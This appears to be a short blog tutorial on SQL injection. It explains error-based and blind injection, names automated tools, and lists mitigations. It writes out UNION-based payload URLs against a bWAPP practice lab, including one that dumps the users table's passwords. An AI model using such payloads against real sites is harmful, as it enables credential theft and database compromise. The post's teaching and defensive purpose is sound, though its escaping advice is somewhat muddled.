SQL Injection

 How it works?

https://www.owasp.org/index.php/SQL_Injection

Basically, A SQL Injection vulnerability can be produced when the code improperly filters the SQL queries, so by not filtering out escape characters and SQL queries hackers can remotely execute SQL Statements and return results.

 

ERROR BASED SQLI:

the first thing you will do is try a couple of tests such as inserting a quote  ’  or double quote  and if the database returns an error then you will come to realize that the server has error based SQLI vulnerabilities, so then you will try to execute statements such as ORDER BY to see how many columns the database has.

this will return an error saying something like Unknow Column ‘7’

This tells you that there is no column 7 so, this is good because we can then use

 

UNION STATEMENTS

to inject code into that column and get back results. This is a basic procedure to follow but this only works for Error Based SQLI.

 

 

BLIND BASED SQLI:

When you come across an SQLI vulnerability that does not return an error, it might be blind SQLI, so in this case, it’s best to use automated tools such as.

 

  •    SQLMAP
  •    SQLNinja
  •    SQLSus

 

 

 

Why is it Dangerous?

SQL Injection is dangerous because hackers can maliciously drop all the database entries and destroy database or even remotely access the database or upload a backdoor, See hackers are after information this could be credit card information, social security numbers, emails, passwords.

 

 

 

Some Commands

   Tests to see if the server is vulnerable

http://192.168.20.131/bWAPP/sqli_1.php?title=’&action=search

Check how many valid Columns there are.

http://192.168.20.131/bWAPP/sqli_1.php?title=1’order by 1,2,3,4,5,6,7– -&action=search

Checks the version of the MySql Database

http://192.168.20.131/bWAPP/sqli_1.php?title=1’union+select+1,@@version,3,4,5,6,7–+-&action=search

Retrieves the password from the user table

http://192.168.20.131/bWAPP/sqli_1.php?title=1’union+select+1,(SELECT+GROUP_CONCAT(password+SEPARATOR+0x3c62723e)+FROM+users),3,4,5,6,7–+-&action=search

 

 

A Useful Tool

A useful tool for Website hacking is HackBar

It only works for Firefox.

https://addons.mozilla.org/en-US/firefox/addon/hackbar1/

unrestricted file-upload high.jpg

Vulnerable Code

$var = $_POST[‘var’];
mysql_query(“SELECT * FROM sometable WHERE id = $var”);

 

How to deal with it.

Ways to avoid SQLI.

 

  • Parametrized Statements.
  • Use stored procedures.
  • Escaping All User Supplied Input

 

 

Do not use vulnerable PHP Functions

$var = mysql_real_escape_string($_POST[‘var’]);

PHP comes with many built-in functions, such as addslashesmysql_escape_string and mysql_real_escape_string

Some of these functions have flaws and will be obsolete.

 

Demonstration Of The Attack

If you have any questions please comment below.

Leave a Reply